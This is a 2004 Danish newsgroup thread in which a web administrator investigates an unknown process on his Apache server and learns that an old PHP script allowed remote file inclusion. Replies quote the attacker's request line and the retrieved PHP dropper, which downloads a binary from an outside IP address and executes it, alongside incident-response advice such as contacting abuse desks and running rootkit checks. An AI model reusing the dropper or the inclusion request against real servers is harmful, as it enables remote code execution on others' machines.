|
|
 | proces: sh -c /tmp/dsadas;rm -f /tmp/dsad~
Fra : Kim Emax |
Dato : 12-09-04 21:32 |
|
Hej
Jeg har lige dræbt en process, som jeg ikke lige genkender, der har kørt på
mit system. Wackede den samme for et par uger siden:
sh -c /tmp/dsadas;rm -f /tmp/dsadas
tjekker jeg processIDet i /proc/ vises følgende:
ls -al
total 40
dr-xr-xr-x 3 nobody nobody 4096 Sep 12 22:00 .
drwxr-x--- 7 root root 4096 Sep 12 22:05 ..
-r--r--r-- 1 nobody nobody 36 Sep 12 22:00 cmdline
lrwxrwxrwx 1 nobody nobody 1 Sep 12 22:00 cwd -> /
-r-------- 1 nobody nobody 285 Sep 12 22:00 environ
lrwxrwxrwx 1 nobody nobody 29 Sep 12 22:00 exe ->
/tmp/upxDE1Y0GDABQ5 (deleted)
dr-x------ 2 nobody nobody 4096 Sep 12 22:00 fd
-r--r--r-- 1 nobody nobody 594 Sep 12 22:00 maps
-rw------- 1 root root 0 Sep 12 22:00 mem
-r--r--r-- 1 nobody nobody 193 Sep 12 22:00 mounts
lrwxrwxrwx 1 nobody nobody 1 Sep 12 22:00 root -> /
-r--r--r-- 1 nobody nobody 196 Sep 12 22:00 stat
-r--r--r-- 1 nobody nobody 22 Sep 12 22:00 statm
-r--r--r-- 1 nobody nobody 440 Sep 12 22:00 status
fd indeholder en masse symlinks til logfilerne, 3 til /dev/null og 4 til
sockets:
lrwxrwxrwx 1 nobody nobody 9 Sep 12 22:00 0 -> /dev/null
lrwxrwxrwx 1 nobody nobody 9 Sep 12 22:00 1 -> /dev/null
lrwxrwxrwx 1 nobody nobody 15 Sep 12 22:00 3 -> socket:[308539]
lrwxrwxrwx 1 nobody nobody 15 Sep 12 22:00 4 -> socket:[165382]
Hvad pokker sker der og hvordan undgår jeg at det sker igen? Noget tyder på
at det er via apache denne process er startet, der står noget om /tmp/dsadas
i error_log og apache kører også som nobody. Jeg kører nyeste Apache 1.3.31
og Mod_ssl 2.8.19
--
Take Care
Kim Emax - master|minds - Vi tænker IT for dig...
http://www.masterminds.dk - http://www.emax.dk
| |
 Kim Emax (12-09-2004)
| Kommentar
Fra : Kim Emax |
Dato : 12-09-04 21:37 |
|
supplerende oplysning:
Processen kontakter: stream.jmi.or.jp.
Kim
| |
Adam Sjøgren (12-09-2004)
| Kommentar
Fra : Adam Sjøgren |
Dato : 12-09-04 22:01 |
|
On Sun, 12 Sep 2004 22:32:29 +0200, Kim wrote:
> Hej Jeg har lige dræbt en process, som jeg ikke lige genkender, der
> har kørt på mit system. Wackede den samme for et par uger siden:
> sh -c /tmp/dsadas;rm -f /tmp/dsadas
Google er din ven:
< http://tweetypie.doc.ic.ac.uk/~agl02/>
Mvh.
--
"Who ees thees Kählveen?" Adam Sjøgren
asjo@koldfront.dk
| |
Kim Emax (12-09-2004)
| Kommentar
Fra : Kim Emax |
Dato : 12-09-04 22:11 |
|
Adam "Sjøgren" wrote:
>> sh -c /tmp/dsadas;rm -f /tmp/dsadas
>
> Google er din ven:
> < http://tweetypie.doc.ic.ac.uk/~agl02/>
I know, og vil du være min ven  , må godt fortælle, hvad du søgte på, for
jeg fandt intet, da jeg søgte på "sh -c /tmp/dsadas"
Nå, men jeg fandt det så ved at droppe sh -c i søgningen. Og fandt ud af at
jeg har et OLDgammelt script, der ikke tjekker, hvad der står i $action
inden det inkludere $action . ".inc":
GET /index.php?action= http://142.176.141.5:113/
hmmm.... Tak for hjælpen anyway! Hvad gør dette nærmere, er det
skadeligt?
--
Take Care
Kim Emax - master|minds - Vi tænker IT for dig...
http://www.masterminds.dk - http://www.emax.dk
| |
 Peter Dalgaard (12-09-2004)
| Kommentar
Fra : Peter Dalgaard |
Dato : 12-09-04 22:43 |
|
"Kim Emax" <newsgroup@remove-emax.dk> writes:
> GET /index.php?action= http://142.176.141.5:113/
>
> hmmm.... Tak for hjælpen anyway! Hvad gør dette nærmere, er det
> skadeligt?
Slynglen er åbenbart ikke død endnu. wget på ovenstående gav mig
(modulo linjeskift):
> more index.html
<?
passthru("killall -9 exe dsadas /tmp/dsadas");
@unlink("/tmp/dsadas");
$fd = fopen("/tmp/dsadas", "w"); if(!$fd) exit;
$xx = fopen(' http://142.176.141.5/tmp', 'rb');
while($x=fread($xx, 10240)) fwrite($fd, $x); fclose($xx); fclose($fd);
chmod("/tmp/dsadas", 0700);
passthru("/tmp/dsadas;rm -f /tmp/dsadas");
?>
Så den henter tilsyneladende et arbitrært stykke kode og eksekverer
det som den bruger der kører apache. Desværre fik jeg en 404 på
http://142.176.141.5/tmp så det er ikke til at vide hvad /tmp/dsadas
indeholdt. Medmindre du selv havde åndsnærværelse til at gemme den...
--
O__ ---- Peter Dalgaard Blegdamsvej 3
c/ /'_ --- Dept. of Biostatistics 2200 Cph. N
(*) \(*) -- University of Copenhagen Denmark Ph: (+45) 35327918
~~~~~~~~~~ - (p.dalgaard@biostat.ku.dk) FAX: (+45) 35327907
| |
Kim Emax (12-09-2004)
| Kommentar
Fra : Kim Emax |
Dato : 12-09-04 23:26 |
|
Peter Dalgaard wrote:
> Slynglen er åbenbart ikke død endnu. wget på ovenstående gav mig
øhhh, ikke på min server vel? Det er 142.176... du har prøvet på ik?
> (modulo linjeskift):
>
>> more index.html
> <?
> passthru("killall -9 exe dsadas /tmp/dsadas");
> @unlink("/tmp/dsadas");
> $fd = fopen("/tmp/dsadas", "w"); if(!$fd) exit;
> $xx = fopen(' http://142.176.141.5/tmp', 'rb');
> while($x=fread($xx, 10240)) fwrite($fd, $x); fclose($xx); fclose($fd);
> chmod("/tmp/dsadas", 0700);
> passthru("/tmp/dsadas;rm -f /tmp/dsadas");
>>
>
> Så den henter tilsyneladende et arbitrært stykke kode og eksekverer
> det som den bruger der kører apache. Desværre fik jeg en 404 på
> http://142.176.141.5/tmp så det er ikke til at vide hvad /tmp/dsadas
> indeholdt. Medmindre du selv havde åndsnærværelse til at gemme den...
Jeg har gemt alt, hvad der lå i /proc/PID/, hvis du vil se det? Jeg kunne
også åbne for fejlen i scriptet igen og sætte et script til at tjekke
outputtet af ps aux og så kopiere /tmp/dsadas, hvis der er et match (eller
bare kigge efter og kopiere /tmp/dsadas)
--
Take Care
Kim Emax - master|minds - Vi tænker IT for dig...
http://www.masterminds.dk - http://www.emax.dk
| |
Peter Dalgaard (13-09-2004)
| Kommentar
Fra : Peter Dalgaard |
Dato : 13-09-04 10:43 |
|
"Kim Emax" <newsgroup@remove-emax.dk> writes:
> Peter Dalgaard wrote:
>
> > Slynglen er åbenbart ikke død endnu. wget på ovenstående gav mig
>
> øhhh, ikke på min server vel? Det er 142.176... du har prøvet på ik?
http://142.176.141.5:113
> Jeg har gemt alt, hvad der lå i /proc/PID/, hvis du vil se det? Jeg kunne
> også åbne for fejlen i scriptet igen og sætte et script til at tjekke
> outputtet af ps aux og så kopiere /tmp/dsadas, hvis der er et match (eller
> bare kigge efter og kopiere /tmp/dsadas)
Der er sikkert større eksperter end mig i gruppen...
--
O__ ---- Peter Dalgaard Blegdamsvej 3
c/ /'_ --- Dept. of Biostatistics 2200 Cph. N
(*) \(*) -- University of Copenhagen Denmark Ph: (+45) 35327918
~~~~~~~~~~ - (p.dalgaard@biostat.ku.dk) FAX: (+45) 35327907
| |
Povl H. Pedersen (12-09-2004)
| Kommentar
Fra : Povl H. Pedersen |
Dato : 12-09-04 23:08 |
|
In article <jX21d.47048$Vf.2403558@news000.worldonline.dk>, Kim Emax wrote:
> Adam "Sjøgren" wrote:
>
>>> sh -c /tmp/dsadas;rm -f /tmp/dsadas
>>
>> Google er din ven:
>> < http://tweetypie.doc.ic.ac.uk/~agl02/>
>
> I know, og vil du være min ven , må godt fortælle, hvad du søgte på, for
> jeg fandt intet, da jeg søgte på "sh -c /tmp/dsadas"
-c betyder du ikke ønsker sider hvor der står c på.
--
Povl H. Pedersen - NoSpam@my.terminal.dk (yes - it works)
Fastnet - IP telefoni: 5 kr/md Se http://www.musimi.dk
| |
Andreas Kleist Svend~ (13-09-2004)
| Kommentar
Fra : Andreas Kleist Svend~ |
Dato : 13-09-04 08:27 |
|
Povl H. Pedersen wrote:
> In article <jX21d.47048$Vf.2403558@news000.worldonline.dk>, Kim Emax wrote:
>
>>I know, og vil du være min ven , må godt fortælle, hvad du søgte på, for
>>jeg fandt intet, da jeg søgte på "sh -c /tmp/dsadas"
>
>
> -c betyder du ikke ønsker sider hvor der står c på.
Nej, ikke når det står i gåseøjne. Prøv f.eks. en søgning på "ls -l".
/Andreas
| |
Dennis Jørgensen (13-09-2004)
| Kommentar
Fra : Dennis Jørgensen |
Dato : 13-09-04 11:01 |
|
"Kim Emax" <newsgroup@remove-emax.dk> writes:
> Nå, men jeg fandt det så ved at droppe sh -c i søgningen. Og fandt ud af at
> jeg har et OLDgammelt script, der ikke tjekker, hvad der står i $action
> inden det inkludere $action . ".inc":
>
> GET /index.php?action= http://142.176.141.5:113/
>
> hmmm.... Tak for hjælpen anyway! Hvad gør dette nærmere, er det
> skadeligt?
dnj@vetinari  $ wget http://142.176.141.5:113
[blabla]
11:36:53 (2.99 MB/s) - `index.html' saved [314/314]
dnj@vetinari $ cat index.html
<? passthru("killall -9 exe dsadas /tmp/dsadas");
@unlink("/tmp/dsadas"); $fd = fopen("/tmp/dsadas", "w"); if(!$fd) exit;
$xx = fopen(' http://142.176.141.5/tmp', 'rb'); while($x=fread($xx,
10240)) fwrite($fd, $x); fclose($xx); fclose($fd); chmod("/tmp/dsadas",
0700); passthru("/tmp/dsadas;rm -f /tmp/dsadas"); ?>
dnj@vetinari $
Det er altid skadeligt at lade tilfældige mennesker køre tilfældige
programmer på ens pc.
Tilsyneladende er programmet ikke længere tilgængeligt, men jeg ville
stadig sende en mail til abuse@aliant.net (såvidt jeg kan se), så kan de
sende det videre i systemet. Det er ganske givet ikke meningen at der
skal køre en webserver på port 113 på den maskine.
Du bør nok også overveje om du stadig stoler på indholdet af din egen
maskine.
Mvh.
Dennis Jørgensen
| |
Kim Emax (13-09-2004)
| Kommentar
Fra : Kim Emax |
Dato : 13-09-04 23:27 |
|
"Dennis Jørgensen" wrote:
> Det er altid skadeligt at lade tilfældige mennesker køre tilfældige
> programmer på ens pc.
I hvert fald knap så smart.
> Tilsyneladende er programmet ikke længere tilgængeligt, men jeg ville
> stadig sende en mail til abuse@aliant.net (såvidt jeg kan se), så kan
> de sende det videre i systemet. Det er ganske givet ikke meningen at
> der skal køre en webserver på port 113 på den maskine.
Som jeg har skrevet andetsteds i tråden, så overvejer jeg at åbne for hullet
igen og lave et script, det holder øje med /tmp/ og skulle svinet dukke op,
så kopiere det, dræbe processen og flytte filen med hullet mv... bare for at
se, hvad det gør og hvad jeg skal kigge efter som du rigtigt nok skriver
nedenfor
> Du bør nok også overveje om du stadig stoler på indholdet af din egen
> maskine.
Jeg har lavet et shellscript, der kører chrootkit hver 3. time, skal have
kigget på snort og sat tripwire op. Andet jeg kan kaste mig over nu jeg er i
gang?
--
Take Care
Kim Emax - master|minds - Vi tænker IT for dig...
http://www.masterminds.dk - http://www.emax.dk
| |
Peter Dalgaard (12-09-2004)
| Kommentar
Fra : Peter Dalgaard |
Dato : 12-09-04 22:04 |
|
"Kim Emax" <newsgroup@remove-emax.dk> writes:
> Hej
>
> Jeg har lige dræbt en process, som jeg ikke lige genkender, der har kørt på
> mit system. Wackede den samme for et par uger siden:
>
> sh -c /tmp/dsadas;rm -f /tmp/dsadas
Se om du kan finde hoved eller hale i følgende blog:
http://tweetypie.doc.ic.ac.uk/~agl02/
--
O__ ---- Peter Dalgaard Blegdamsvej 3
c/ /'_ --- Dept. of Biostatistics 2200 Cph. N
(*) \(*) -- University of Copenhagen Denmark Ph: (+45) 35327918
~~~~~~~~~~ - (p.dalgaard@biostat.ku.dk) FAX: (+45) 35327907
| |
Adam Sjøgren (12-09-2004)
| Kommentar
Fra : Adam Sjøgren |
Dato : 12-09-04 22:13 |
|
On Sun, 12 Sep 2004 23:10:40 +0200, Kim wrote:
> I know, og vil du være min ven , må godt fortælle, hvad du søgte
> på, for jeg fandt intet, da jeg søgte på "sh -c /tmp/dsadas"
Jeg søgte på "/tmp/dsadas"
> hmmm.... Tak for hjælpen anyway! Hvad gør dette nærmere, er det
> skadeligt?
Ingen anelse. Er det skadeligt at din computer bliver udnyttet til
DoS-angreb? Der må svaret vist være ja.
Mvh.
--
"Who ees thees Kählveen?" Adam Sjøgren
asjo@koldfront.dk
| |
Alex Holst (14-09-2004)
| Kommentar
Fra : Alex Holst |
Dato : 14-09-04 00:07 |
|
Kim Emax wrote:
> Jeg har lige dræbt en process, som jeg ikke lige genkender, der har kørt på
> mit system. Wackede den samme for et par uger siden:
>
> sh -c /tmp/dsadas;rm -f /tmp/dsadas
http://sikkerhed-faq.dk/servere#indbrud
--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.mongers.org
OSS/FAQ for dk.edb.sikkerhed: http://sikkerhed-faq.dk
| |
|
|